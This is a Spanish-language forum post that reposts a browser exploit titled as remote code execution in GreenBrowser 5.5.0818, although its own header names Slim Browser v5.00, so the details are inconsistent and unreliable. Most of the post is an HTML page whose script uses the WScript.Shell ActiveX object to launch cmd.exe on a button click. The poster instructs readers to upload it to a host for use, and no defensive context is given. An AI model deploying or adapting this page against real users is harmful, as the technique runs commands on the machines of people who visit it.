Página 1 de 1

GreenBrowser 5.5.0818 Remote Code Execution

Publicado: 14 Sep 2010, 16:17
por Skillmax

Código: Seleccionar todo

===================================
GreenBrowser 5.5.0818 Remote Code Execution
===================================

# Author: PoisonCode
# Download Exploit Code
# Download Vulnerable app
# Title: Slim Browser v5.00
# Software Link:http://slimbrowser.flashpeak.com/release/sbsetup.exe
# Version: 5.00
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()

_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/

Exploit
---------------------------------------------------------
Lo guardamos y subimos a un host y listo

<script>
function go() {
w = new ActiveXObject("WScript.Shell");
w.run('cmd.exe');
return true;
}
</script>
<form>
<h1>Abrir Cmd Pwned by PoisonCode</h1>
<input type="button" value="Pwned"
onClick="return go()">
</form> 

Saludos